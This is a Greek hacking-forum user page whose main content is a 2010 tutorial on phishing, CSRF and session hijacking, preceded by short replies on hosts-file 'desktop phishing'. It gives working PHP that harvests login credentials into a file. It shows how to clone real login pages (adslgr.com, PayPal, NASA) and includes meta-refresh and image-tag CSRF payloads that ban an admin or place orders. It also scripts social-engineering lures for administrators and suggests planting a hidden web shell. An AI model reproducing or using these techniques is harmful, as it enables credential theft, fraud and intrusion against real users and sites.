Jump to content

dr0pper

Members
  • Content count

    20
  • Joined

  • Last visited

About dr0pper

  • Rank
    Newbie

Profile Information

  • Gender
    Male
  • Location
    <*_p0wnbox_*>
  1. dr0pper

    Desktop phishing

    Ναι , στην ουσία πρέπει να έχεις τα αρχεία του εκάστοτε συστήματος , με άλλα λόγια να ξέρεις να στήνεις έναν σέρβερ.Ε ναι φυσικά και δεν γίνεται να κάνεις private φατσοβιβλίο αφού καταλαβαίνεις , οι χρήστες θα μπαίνουν στο κανονικό , εκτός και αν καταφέρεις να μολύνεις σε όλους το host file , και πάρεις access και στο fB :P
  2. dr0pper

    Desktop phishing

    Ναι ,τώρα κατάλαβα τι λες. Έστω μία πειραγμένη σελίδα Χ . Αυτή η Χ λοιπόν παίρνουμε σαν δεδομένο ότι έχει /phpmyadmin/ directory installed.Προφανώς σε αυτό μπορούμε να μπούμε από εδώ : www.x.gr/phpmyadmin/ κλπ. Αυτό έχει γίνει install ας πούμε σε έναν fedora server μαζί με άλλα προγράμματα επίσης.Αν εσύ τώρα πειράξεις το hosts και βάλεις πχ www.x.gr 1.1.1.1 η σελίδα τότε δεν θα ανοίξει καθόλου αφού η ip αυτή είναι ανύπαρκτη.Αν δηλαδή βάλεις μετά http://1.1.1.1/phpmyadmin/ , δεν θα ανοίξει φυσικά.Για να εξομοιώσεις μια σελίδα , δεν είναι τόσο εύκολο γιατί πρέπει προφανώς να βρεις τα αρχεία της και τον πηγαίο τους κώδικα ώστε να "σταθούν" , να επικοινωνήσουν όπως πολύ καλά είπες. Αυτό μπορεί να γίνει ας πούμε εάν επιτεθείς σε έναν σέρβερ και τότε έχεις πρόσβαση σε όλα του τα αρχεία , δεις τι συστήματα και προγράμματα τρέχει και τι μπορείς να κάνεις!
  3. dr0pper

    Desktop phishing

    Θεωρώντας ότι έχεις διαβάσει ολόκληρο το άρθρο του pr0n , πρέπει στη συνέχεια να καταλάβεις όλα αυτά που δείχνει πως δουλεύουν.Για να ρωτάς όμως κάτι τέτοιο λογικά δεν το κατάλαβες πλήρως.Εν ολίγοις , η διαδικασία που ακολουθείται είναι η εξής : Αλλάζουμε το αρχείο hosts ώστε να αλλάξει ο τοπικός dns του μηχανήματος που εκτελείται το πρόγραμμα για το αρχείο αυτό , με την προϋπόθεση το www.facebook.com στην ουσία να πηγαίνει στον webserver τον δικό μας , όπου έχουμε ανεβάσει τα 3 αρχεία και να ανοίγει το index.html(το fake).Επομένως όταν ο χρήστης προσπαθήσει να συνδεθεί στο facebook και πάει στην σελίδα του ενώ έχει ήδη εκτελέσει το πρόγραμμα για το hosts και έχουν πειραχτεί οι dns , στην ουσία τα πράγματα έχουν έτσι : www.facebook.com 192.168.*.* < -- local server (η διεύθυνση δείχνει εντάξει , αλλά όμως είναι fake αφού από πίσω βρίσκεται η ip του δικού μας σέρβερ) Bλέποντας έτσι μόνο το index.htm από το facebook , είναι λογικό όταν δώσεις τα credentials να μην συνδεθείς αφού δεν βρίσκεσαι πλέον στο facebook αλλά σε έναν moddified server!Όσο για το αρχείο hosts , γιατί να το αλλάξεις?Από τη στιγμή που γίνει το infection τότε γιατί να το χαλάσεις και να βρεθείς πάλι στην αρχή?Εκτός και αν το λες για να μην σε καταλάβει το θύμα. Σε αυτή την περίπτωση , ο σκοπός έχει επιτευχθεί αν το θύμα καταλάβει τι έπαθε και προσπαθήσει να επανορθώσει τη ζημιά , αυτό εσένα δεν σε αφορά!
  4. Λίγο άστοχη ερώτηση, αφού όπως είπε και o oblique , πρώτα πρέπει να γνωρίζεις programming , και *όχι* μόνο C# αλλά γενικότερα!Αν τώρα ασχολείσαι με την C# και έχεις βάσεις , τότε για εμένα δεν χρειάζεται να ψάχνεις από που θα αρχίσεις , αφού υποτίθεται ότι ήδη θα μπορείς να χρησιμοποιήσεις τις γνώσεις που έχεις ώστε να φτιάξεις το δικό σου πρόγραμμα..
  5. dr0pper

    Προβλημα με Backtrack 4

    Ίσως και με λίγο googling (http://bit.ly/cXvkG0) , να έπαιρνες ιδέες και να προχωρούσες πιο κοντά ..στη λύση του προβλήματος!
  6. Yes , of course you will..
  7. /\--------------------------------------------------------------------------------------------------| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - =-PH(f)ISHERS(the art of f(ph)ishing)-= ~Take care ~ Discriminate the Fake from the Real one~ ~www.s3cure.gr /p0wnp0rtal 2010-2011~ 20/10/2010 time: 2:58am (finished) ~~by_dr0pper~~ ----------------------------------------------------------------------------------------------------\/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Σκέφτηκα ,λοιπόν, να φτιάξω έναν based-οδηγό από την αρχή σχετικά με το phishing!Ξέρω , ότι σχετικά με αυτό το θέμα έχουν γίνει αναλύσεις , και φυσικά όλοι(σχεδόν) , και λέω σχεδόν για να μην γίνομαι υπερβολικός , μπορούν πλέον να φτιάξουν μια κάλπικη ιστοσελίδα και να προσπαθήσουν να ξεγελάσουν κάποιον χρήστη!Υπάρχουν πολλοί, οδηγοί και άρθρα σχετικά με αυτό το θέμα στο ίντερνετ , παρότι αυτό στο συγεκριμένο προσπαθώ να κάνω μια επεξηγηματική ανάλυση, ώστε να καταλάβει ακόμη...και εκείνο το 10% που δεν γνωρίζει ακόμη το phishing ή δεν έχει ξεκαθαρίσει στο μυαλό του κάποια πράγματα ή ακόμη μπερδεύεται και δεν ξέρει από που να αρχίσει!Επίσης , οι περισσότεροι οδηγοί phishing που υπάρχουν στο ίντερνετ παίρνουν σαν δεδομένο ότι προκειμένου να κάνουμε phishing σε κάποια ιστοσελίδα, πρέπει να έχουν έναν free web server , όπου θα ανεβάσουμε τα αρχεία μας ώστε να το επιτύχουμε.Βέβαια , αυτό σύμφωνα με εμένα δεν είναι ο καλύτερος τρόπος αν θέλουμε να κάνουμε ένα δυνατό phishing αφού οι free hosts στην πλειονότητα μας κάνουν disable το account , καθώς "καταλαβαίνουν" , ότι το χρησιμοποιούμε για παράνομες ενέργειες!Έτσι δεν υπάρχει νόημα να χρησιμοποιήσουμε κάτι τέτοιο!Φυσικά και προτιμούμε να χρησιμοποιήσουμε έναν δικό μας webserver καθώς εκεί δεν θα υπάρχει κάποιος για να μας σταματήσει!Γενικά προτιμάμε πάντα να χρησιμοποιούμε δικά μας κομμάτια σε οτιδήποτε κάνουμε , καθώς μιλάμε για full privilege abilities.Aς το δούμε σαν ένα revision , καθώς υπάρχουν εδώ παρόμοια tutorials.Lets begin! . A ) |=---------------------------------------------------------=| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | [ Case of phishing & XRSF/CRSF ] | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |=---------------------------------------------------------=| What is phishing? (general - the Xplanation) According to wikipedia phishing is: phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures. A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing,[4] probably influenced by phreaking,[5][6] and alludes to baits used to "catch" financial information and passwords. Σε αυτόν τον οδηγό θα ασχοληθούμε τόσο με το phishing όσο και μια ιδέα σχετικά με το cross site request forgery attack! What is XSRF/CRSF?(Known also as click-jacking , session-riding) Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF ("sea-surf"[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. Έτσι αυτή η τεχνική , ίσως θα μπορούσε να είναι ακόμη χειρότερη από το phishing.Θα δούμε λοιπόν , παραδείγματα phishing , καθώς και CRSF , θα τα αναλύσουμε και θα καταλάβουμε την λειτουργία τους.Το μόνο που θέλω να ξεκαθαρίσω από τώρα είναι το γεγονός ότι αν τα χρησιμοποιήσετε για να βλάψετε άλλους χρήστες - τόσο τους δικού μας forum όσο και των άλλων - η κοινότητά μας δεν φέρνει ΑΠOΛΥΤΩΣ καμία μα καμία ευθύνη για τις ενέργειες που θα σκεφτούν κάποιοι να πραγματοποιήσουν.Ο κόσμος , δεν φταίει σε τίποτα, και δεν χρειάζεται να τον παιδεύουμε κλέβοντας κωδικούς , ονόματα , αριθμούς και άλλα στοιχεία πιστωτικών καρτών και άλλων χρήσιμων εργαλείων για να εισέλθουμε σε άλλους διαδικτυακούς τόπους , παράνομα.Δεν είναι αυτός ο σκοπός μας , ανέξαρτητα αν είναι του phishing.Δεν μας ενδιαφέρει αυτό , εμάς αυτό που μας ενδιαφέρει είναι να δούμε τον τρόπο τους.Αν πιαστεί οποιοδήποτε μέλος μας αποκλειστικά της δικής μας κοινότητας να θέλει να βλάψει άλλον χρήστη θα τιμωρηθεί.Το αναφέρω ξανά διότι δεν είναι για παιχνίδι. Προκεμένου να επιτύχουμε μια τέτοια επίθεση , θα σας πω ότι επίσης θα χρεαστεί να σχεδιάσουμε και το λεγόμενο Social Engineering.(κοινωνική μηχανική) , χωρίς να είναι απαραίτητο σε κάθε πρωτοβουλία που παίρνουμε. So , what is social Engineering? Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying).[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim. Mε λίγα λόγια, εκμεταλλευόμαστε τον στόχο μας με μηνύματα , είτε αυτά είναι pm(βλ.φόρουμς) είτε μυνήματα από κάποια διαδυκτιακή υπηρεσία(βλ.hotmail , yahoo, gmail κ.ά) που πηγαίνουν σε κάποιον παραλήπτη.Δηλαδή παραπλανούμε τον άλλο χρήστη ώστε να πατήσει κάτι που εμείς θέλουμε (πχ , το phised link) ή ότι άλλο θέλουμε κάθε φορά.Όπως είπα και στην αρχή δεν είναι πάντα απαραίτητο να το κάνουμε αλλά τις περισσότερες φορές αναγκαζόμαστε να το χρησιμοποιούμε.Πάμε λοιπόν να ξεκινήσουμε. Ως πρώτη μας δουλειά θα είναι να δούμε το phishing , πως ξεκινάει και πως δουλεύει και πως τελειώνει.Οταν , λοιπόν αποφασίσουμε να κάνουμε phishing σε κάποια ιστοσελίδα , αυτό που μας ενδιαφέρει είναι 2 πράγματα: α)Να βρούμε το υποψήφιο θύμα το οποίο θα συμβιβάσουμε , β)αν η ιστοσελίδα μας επιτρέπει να την χρησιμοποιήσουμε για phi(f)ishing. Τώρα , γιατί να το κάνουμε αυτό?Θέλει κάποιος για παράδειγμα να κλέψει credentials , είτε για να επιδείξει τις ικανότητές του, είτε για λόγους προσωπικούς.Οπότε σχετικά με το (α) αναζητούμε τον χρήστη που θα μεσολαβήσει για να μας δώσει πρόσβαση εφόσον πρώτα του δώσουμε εμείς αυτό που θέλουμε(να , το social engineering!). β)Γίνεται?Πάμε αμέσως να ελέγξουμε την ιστοσελίδα.Εφόσον λοιπόν μπούμε , ψάχνουμε για φόρμες όπου έχει login (login.php , admin.php(σε περίπτωση που θέλουμε να ψαρώσουμε τον admin) ,ή απλά login) προκειμένου να φτιάξουμε το phisher. As δοκιμάσουμε στο adslgr.com για το login form.Eγώ μόλις το βρήκα <_http://www.adslgr.com/forum/login.php?do=login_>.Αυτό το λίνκ , αυτή η φόρμα μάλλον μας ζητάει να κάνουμε login δίνοντας τα credentials(username , password).Tώρα για να το φτιάξουμε phisher θα πρέπει να πάρουμε τον κώδικα του <_http://www.adslgr.com/forum/login.php?do=login_> , ώστε να τον τροποποιήσουμε για να έχουμε το phisher , με την προυπόθεση ότι μπορεί να αλλάξει.Εκεί που έιμαστε λοιπόν πατάμε control + U ώστε να έρθει ο κώδικας της ιστοσελίδας(htm(l)). Αφού , έχουμε το source θα το αντιγράψουμε με control + A και θα το επικολλήσουμε με control + V σε ένα αρχείο notepad και στην συνέχεια θα το αποθηκεύσουμε ως .htm.To ανοίγουμε και φυσικά βλέπουμε την πλαστή ιστοσελίδα ανοιχτή στον υπολογιστή μας.Ναι , μπορεί να γίνει phishing! Eφόσον λοιπόν το ανοίξουμε βλέπουμε πως εύλογα επιτρέπει να κάνουμε phishing αφού ο κώδικας μόνος του , μπορεί να σταθεί σε κάποιο αρχείο στον υπολογιστή μας σαν html και να ανοίξει στην συγκεκριμένη τοποθεσία. Τώρα από τον κώδικα με ένα find στο notepad , προσέχουμε τις εξής γραμμές. <form action="/forum/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)"> Τι εννοούν άραγε αυτές?Απλό , είναι τα στοιχεία της φόρμας login που είδαμε προηγουμένως. "/forum/login.php?do=login" , αυτό δείχνει την λειτουργία που ακολουθεί , που είναι δηλαδή η εισαγωγή του χρήστη , και το method="POST" , είναι με ποια μέθοδο γίνεται.Το onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)"> , υποδεικνύει σε τι κωδικοποίηση είναι οι κωδικοί.Md5 , στο συγκεκριμένο .Αυτό έτσι και αλλιώς δεν μας ενδιαφέρει. Οι αλλαγές λοιπόν που θα κάνουμε είναι: 1)<form action="/forum/login.php?do=login" , θα το αλλάξουμε και θα γίνει έτσι <form action="phisher.php" , θα εξηγήσω παρακάτω. 2)method="post" Αν και αυτό δεν μας ενδιαφέρει , είτε γίνει GET είτε POST είναι το ίδιο στην ουσία αφού εξαρτάται από τον κώδικα.Εμείς ωστόσο θα το κάνουμε GET method="GET." Aυτές λοιπόν είναι οι παρεμβάσεις που θα κάνουμε στον κώδικα , ωστε να χρησιμοποιήσουμε το 2ο phisher κατά κάποιο τρόπο το οποίο είναι : <?php header("Location: http://www.adslgr.com/forum/login.php?do=login "); $filename = 'badfile.txt'; $fp = fopen("badfile.txt","a"); foreach($_GET as $variable => $value) { //$_GET means that we change the variable to method="GET" , otherwise $_POST means that we make it method="POST" // $fackedcode = fwrite($fp ,$variable); $fackedcode = fwrite($fp, "="); $fackedcode = fwrite($fp, $value); $fackedcode = fwrite($fp ,"\r\n"); } if (is_writable($filename)) { if (!$handle = fopen($filename, 'a')) { echo "Cannot open file ($filename)"; exit; } echo "Success, wrote fackedcode to file $filename"; fclose($fp); } else { echo "The file $filename is not writable"; } ?> Ωραία , λοιπόν, όλα αυτά τα κάνουμε τόση ώρα ώστε να χρησιμοιποιήσουμε αυτόν τον κώδικα που θα κάνει όλη την δουλειά!O κώδικας είναι γνωστός(μην κοιτάτε τον συγκεκριμένο είναι ύστερα από κάποιες δοκιμές , ναι δουλεύει το ίδιο καλά!) οπότε no point in explaining μόνο ότι ,τo foreach($_GET as $variable => $value) , συμφωνα με το οποίο χρειάστηκε να αλλάξουμε σε GET from POST.Και επίσης το header , 4 γραμμή , δείχνει που θα γίνει το phishing.Βάζουμε φυσικά το login form/Page που βρήκαμε! Αντιγράψτε λοιπόν αυτόν τον κώδικα σε ένα text και αποθηκέυστε το σαν phisher.php(να το λοιπόν!) Τέλος θα χρειαστούμε και ένα απλά αρχείο text , κενό. Εδώ λοιπόν , πρέπει να χρησιμοποιήσουμε έναν web server , αλλά εφόσον θέλουμε μόνο για δοκιμές , θα τα δούμε στον WAMP σερβερ,τοπικός!Aς ανεβάσουμε λοιπόν όλα αυτά(3 αρχεία) στον σέρβερ! Ανοίγουμε λοιπόν , τον fake phisher ο οποίος στην περίπτωσή μου είναι το αρχείο .htm(το οποίο περιέχει το malformed κώδικα του adslgr.com) και σπεύδω αμέσως να κάνω login με τα στοιχεία μου! Kαι εδώ , έχει τελειώσει αφού τα στοιχεία μου έχουν πιαστεί από το phisher.php και έχουν αποθηκευτεί στο αρχείο badfile.Βλέπετε λοιπόν , που βρίσκονται.(και βέβαια εδώ εννοώ το θύμα και όχι εμένα, εφόσον το θύμα θα κάνει αυτήν την κίνηση)!. Όμως προκειμένου να γίνει όλο αυτό θα πρέπει να έχουμε στήσει καλά όλο το σχέδιο.Δηλαδή , πως θα στείλω το ύποπτο λίνκ στο θύμα?Προφανώς με social enginnering , δηλαδή κάτι τέτοιο. Έστω ότι έχουμε έναν server και έχουμε ανεβάσει τα αρχεία μας.Θα πάρουμε το κακό λίνκ , δηλαδή το server.com/x.htm και θα το στήλουμε στο θύμα(πχ στον admin) λέγοντας του: Kαλημέρα administrator , θα ήθελα μια βοήθεια σχετικά με αυτό το ποστ(όπου ποστ βάζουμε το λίνκ μας μασκαρεμένο με την επιλογή hypelink) και θα το αντικαταστήσουμε με ένα λίνκ το οποίο προφανώς "δείχνει" ότι παραπέμπει σε ένα σημείο του forum!Οπότε μόλις το πατήσει ο διαχειριστής , αυτομάτως παίρνουμε τα credentials εφόσον θα έχει κάνει login. Eδώ επιτύχαμε , το social engineering ;-)!Χρήσιμο ε? Θα φτιάξουμε λοιπόν μερικά phishers , έτσι για να σκοτώσουμε την ώρα μας ;-)!Το ένα θα οδηγεί για ψάρωμα στο paypal.com και το δεύτερο στο επίσημο site της nasa.gov. Για να δούμε λοιπόν. Πάμε για το paypal.com Ιδού: Η λογική που ισχύει είναι η παραπάνω που ανέλυσα. Και ενα phisher στο nasa.gov.Iδού: http://mynasa.nasa.gov/portal/site/mynasa/template.FORGOT_PASSWORD , η φόρμα login.Το FORGOT_PASSWORD δεν μας ενδιαφέρει αφού δεν ζητήσαμε κάποιον άλλο κωδικό! Πάμε λοιπόν τώρα να δούμε την δεύτερη μέθοδο , την οποία θα την μελετήσουμε μόνη της αλλά θα την συνδυάσουμε και με το phishing! .Απόσπασμα από wiki : Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF ("sea-surf"[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.Eπίσης αναλυτικός οδηγός σχετικά με το XSRF υπάρχει ήδη εδώ! (http://www.s3cure.gr/index.php?showtopic=956) Προκειμένου να επιτύχουμε CRSF , πρέπει να χρησιμοποιούμε αρχεία των οποίων η επέκταση είναι .php ή .htm(l).Επιπλέον , ποτέ δεν πρέπει να λείπει ένας web server(ναι, δικός μας!). Θα προχωρήσουμε με τον wamp , ο οποίος είναι αρκετά συνεργάσιμος.Τι κάνουμε αρχικά?Πρώτο μας μέλημα είναι να καταλάβουμε τις εντολές με τις οποίες θα παίξουμε!Ας δούμε μια βασική εντολή της html τι μπορεί να κάνει. <html> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.s3cure.gr"> [code] Aν αποθηκεύσουμε ως [name.html] και εκτελέσουμε αυτόν τον κώδικα, τότε αυτό το αρχείο θα μας ανακατευθύνει εκεί που λέει το "url=" δηλαδή στο p0wnbox.com! Συγκεκριμένα την όλη δουλειά την κάνει το "url" , καθώς πολύ απλά μπορούμε να δώσουμε και μια phishing page μιας υπηρεσίας και μέσω εκτέλεσης ενός τέτοιου αρχείου να βρεθούμε σε πλαστό τόπο και να μας πάρουν τα credentials!(κωδικός και όνομα).Ακόμη μπορόυμε να δείξουμε στο "url" μια διεύθυνση η οποία να κατεβάζει κάποιο trojan σύμφωνα με το οποίο να μπούμε στον σκληρό δίσκο του θύματος ή και να του καταστραφεί ο υπολογιστής εκτός και αν τρέχει Linux!:-P! [code] <html> <meta HTTP-EQUIV="REFRESH" content="0; url=http://site.com"> <- τι θέλουμε να κάνουμε! </html> <html> <meta HTTP-EQUIV="REFRESH" content="0; url=http://localhost/name.htm"> </html> Οι εντολές , είναι αρκετά κατανοητές!Έτσι , θα ξεκινήσουμε να δούμε μια επίθεση ,advanced phishing, πάντα κατά την οποία θα συνδυάσουμε 2 τεχνικές, τη μια του phishing πλαστής ιστοσελίδας και την άλλη με το πλαστό αρχείο ή αλλιώς ένα html injected!To test μας πάλι θα το δοκιμάσουμε στο adslgr.com[δεν έχω "κάτι" με το συγκεκριμένο site ,είναι εντελώς τυχαία επιλογή!]. Εδώ λοιπόν το κόλπο που θα κάνουμε είναι το εξής!Θα φτιάξουμε το αρχείο (html injected) , κάπως έτσι: <html> <meta HTTP-EQUIV="REFRESH" content="0; url=http://localhost/.htm"> <-- όπου εδώ , θα βάλουμε το λίνκ από τον phisher με αποτέλεσμα να γίνει redirect(ανακατεύθυνση) στην ψεύτικη login φόρμα! </html> Δηλαδή αρχικά , θα στείλουμε το λίνκ(όπου το λίνκ , θα πρέπει να είναι και encoded για μεγαλύτερη σιγουριά) με το οποίο θα βρίσκεται το αρχείο(htm(l) injected) , το οποίο θα είναι ανεβασμένο στον σέρβερ μας.Μόλις λοιπόν το επισκεφθεί το θύμα , τότε θα γίνει ανακατεύθυνση και θα το στείλει στον 2ο σέρβερ , όπου θα βρίσκεται το fake login!(ίσως χρειαστεί και δεύτερος web server εδώ αν και μπορούμε να το κάνουμε και με έναν!) Φυσικά , μπορούμε να κάνουμε και απλό CSRF!Τι μπορεί να γίνει με το απλό?Μπορούμε πχ , να κάνουμε ban κάποιον χρήστη πολύ απλά με το παρακάτω trick! Kατεβάζουμε , το πρόγραμμα που τρέχει στο forum , και βλέπουμε , τι εντολή εκτελείται όταν bannarουμε κάποιον χρήστη! Έστω η παρακάτω εντολή , -> http://kapio_forum.com/admin=cpanel&act=ban&id=2 , η οποία λέει ότι θα γίνεται ban ο χρήστης 2!Ο διαχεριστής δηλαδή ;-)! Aν λοιπόν την στείλουμε τον διαχειριστή στον σέρβερ μας και εκτελέσει αυτό το αρχείο , θα γίνει μπαν ο ίδιος!Φυσικά , εμείς θα το κάναμε για κάποιο μέλος, μάλλον. <html> <meta HTTP-EQUIV="REFRESH" content="0; url=http://kapio_forum.com/admin=cpanel&act=ban&id=2"> </html> Aυτό θα είναι το τελικό αρχείο! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |[(-combined techniques-)] (some ideas of me) | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - .B ) |=-------------------------------------------------------------------------------------------------------------=| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | [ Case a ) ..of session hijacking combined with session riding/XSRF ] | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |=-------------------------------------------------------------------------------------------------------------=| 1)What is session hijacking..? Information from wikipedia: In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). .Πάλι θα ήθελα να επισημάνω ότι το session hijacking αναφέρεται here! (http://www.s3cure.gr/index.php?showtopic=1798).Όποιος λοιπόν , το έχει διαβάσει , ειναι καλυμμένος! Εγώ λοιπόν ας ξαναπώ 2 λόγια!Προκειμένου να καταλάβουμε αν μια σελίδα είναι ευπαθές στο session hijacking,πρέπει να ελέγχουμε στο url δείγματα από λέξεις σαν "sessionid=arthmos_megalos" ,"PHPsessionid=arithmos" , δηλαδή όπου δημιουργείται sessionid όταν κάνουμε login!Επομένως αν κάνουμε login σε μια σελίδα και μας δώσει για παράδειγμα 'sessionID=12121212' , τότε αυτό θα είναι active για εμάς όση ώρα είμαστε Logged In!Συνεπώς , παίρνοντας δεδομένο ότι υπάρχει σύστημα στην ιστοσελίδα που υπολογίζει και "μοιράζει" όχι τυχαία αλλά υπολογίσιμα Session IDs τότε ο κάθε χρήστης θα έχει από ένα δικό του!Eδώ λοιπόν , παρατηρείται και το session hijacking!Αν κάνουμε , λοιπόν , login και λάβουμε ένα session id , τότε τι θα γίνει αν το στείλουμε με ένα encoded link στον διαχειριστή ή ακόμη και σε κάποιο μέλος?(προφανώς με social Enginnering).Ναι, θα μπούμε στη θέση τους , δηλαδή θα αποκτήσουμε ίδια permissions!Φυσικά, με τον διαχειριστή θα παίξουμε ή με κάποιον συντονιστή αφού τέτοια privilege μας ενδιαφέρουν! Από τη στιγμή που θα πετύχει, θα έχουμε πολλά και διάφορα δικαιώματα να τα αξιοποιήσουμε ανάλογα , με την ανάγκη μας , με το τίμημα όμως ότι είμαστε σε περιορισμένο χρόνο αφού μόλις κάνει logout το θύμα , θα χαθεί το active session ID , οπότε θα το χάσουμε και εμείς οπότε κάπου εκεί θα επανέλθουμε στην θέση μας! 2)What about session riding..? one-click attack or session riding and abbreviated as CSRF ("sea-surf"[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser..Δεν έχει διαφορά από την CRSF, είναι το ίδιο , μόνο που μπορεί να εφαρμοστεί διαφορετικά!Οφείλω να επισημάνω εδώ , ότι αυτές οι 2 τεχνικές *δεν* κολλάνε , δηλαδή δεν συνδυάζονται εύκολα καθώς δεν μπορεί η μία να υποστηρίξει την άλλη , και να προσφέρει κάποια στοιχειώδη βοήθεια αφού επιτελούν έναν διαφορετικό σκοπό μέσα από τον οποίο έχουμε δυνατότητες για άλλες ... τεχνικές!Πάντως ξαναλέω όχι για τόσο phishing!Παρόλου αυτά , προσπάθησα και τις συνδύασα ανατέθοντας φυσικά και μια δουλειά στο session hijacking! Ας κάνουμε λοιπόν 2 "απανωτά" phishing! Προκειμένου λοιπόν , να τις συνδυάσουμε , θα πρέπει να έχουμε κάνει ήδη session hijacking σε έναν χρήστη σε κάποιο online σύστημα(που φυσικά σημαίνει ότι θα είμαστε και εμείς logged in!) , και από τη στιγμή που θα έχουμε το ίδιο Session ID, θα μπορούμε να κάνουμε ίδιες κινήσεις!Τώρα , όσον αναφορά την session riding δηλαδή την XRSF , αυτό που θα κάνουμε θα είναι να στείλουμε ένα λίνκ μασκαρεμένο στο account του χρήστη όπου ήδη είμαστε μέσα χάρη στο session hijacking!Και αν αναρωτιέστε γιατι να το κάνουμε αυτό, δεν θα μου έκανε καθόλου εντύπωση!Προσωπικά , θα έκανα session hijacking στον διαχειριστή του online συστήματος και θα προσευχόμουν αρχικά να ..την πατήσει ώστε να πετύχει!Όμως για να πετύχει θα του έστελνα ένα juicy link όπου θα είχα ποστάρει , ώστε να απασχοληθεί και να έχω αρκετό χρόνο για να σκεφτώ και να κάνω ...ότι είναι να κάνω!Και ενώ λοιπόν θα ήμουν στη θέση του διαχειριστή , ως πρώτο μέλημα θα ήταν να σηκώσω ένα shellάκι για να ψάξω την ιστοσελίδα και τον σέρβερ!(αν και δεν μας ενδιαφέρει ιδιαίτερα),και που φυσικά το -κέλυφος- θα το σηκώναμε σε ένα μέρος όπου καθόλου μα καθόλου διακριτό από τον διαχειριστή!(πχ σε ενα directory με junk files , το οποίο θα ήταν προσβάσιμο και ..απέξω , ώστε όταν θα έχανα το session να είχα ακόμη access!Αυτό όμως δεν ήταν ο αρχικός σκοπός μας , αλλά πως να κοροιδέψουμε τον διαχειριστή!Αν λοιπόν , είχαμε σηκώσει ένα shell δεν θα ήταν καθόλου δύσκολο να κάναμε modify ένα page και όπου στη θέση του κώδικα του να προσθέταμε κώδικα για να εκτελέσει την εντολή αγοράς!πχ έστω αυτό (www.server.com/vulnerab_applic?cmd=buyid3&product=3) (και προσέξτε!! , χωρίς να αλλάξουμε το όνομα του αρχείου ώστε να μην καταλάβει τίποτα ο διαχειριστής!).Πλέον , είμαστε έτοιμοι να ψαρώσουμε όχι μόνο τον διαχειριστή αλλά **όλους** τους χρήστες της ιστοσελίδας αφού με ελάχιστη κοινωνική μηχανική θα στέλναμε λίνκ (το html injected directory) από την *ίδια* την ιστοσελίδα , λέγοντας τους ότι η χ εφαρμογή έγινε update , και πρέπει να την ελέγξετε οπωσδήποτε!Γιατί λοιπόν να μην το πατήσουν , αφού είναι η ίδια ιστοσελίδα..?:D Ναι φυσικά και θα κάνουν κλικ! |=--------------------------------------------------------------=| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |[ Case b ) ..of simple session riding ]| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |=--------------------------------------------------------------=| Ένα απλό session riding είναι πολύ απλό να γίνει, ίσως με λιγότερα θύματα όμως!(σχετικό αυτό βέβαια).Σύμφωνα λοιπόν με αυτό , πάλι μπορούμε να κοροιδέψουμε το θύμα στέλνοντας του μια εντολή κρυμμένη μέσα σε αρχείο , με αποτέλεσμα να εκτελεσθεί στον δικό του υπολογιστή! Πάλι θα πάρουμε για παράδειγμα το παραπάνω online σύστημα , σύμφωνα με το οποίο θα εκτελέσουμε την εντολή αγοράς ...πάνω στο θύμα μας!Οι εντολές που εκτελούνται είναι ίδιες με αυτές του CRSF δηλαδή : <img src="http://www.server.com/make_order.php?categ=pc&ThinkPad+80x=COD&submit=Order" /> , η οποία φυσικά θα βρίσκεται μέσα σε αρχείο html , για την ακρίβεια το html injected ανεβασμένο σε κάποιον server!Πολύ απλά λοιπόν θα στείλουμε το λίνκ με το αρχείο στο υποψήφιο θύμα μας μέσω κοινωνικής μηχανικής ώστε να "αναγκαστεί να το πατήσει"!Εδώ δεν υπάρχει κάποια πολυπλοκότητα , αλλά πάντα έχει σημασία πως το σχεδιάζει ο καθένας!Στις περιπτώσεις μας γίνονται GET requests 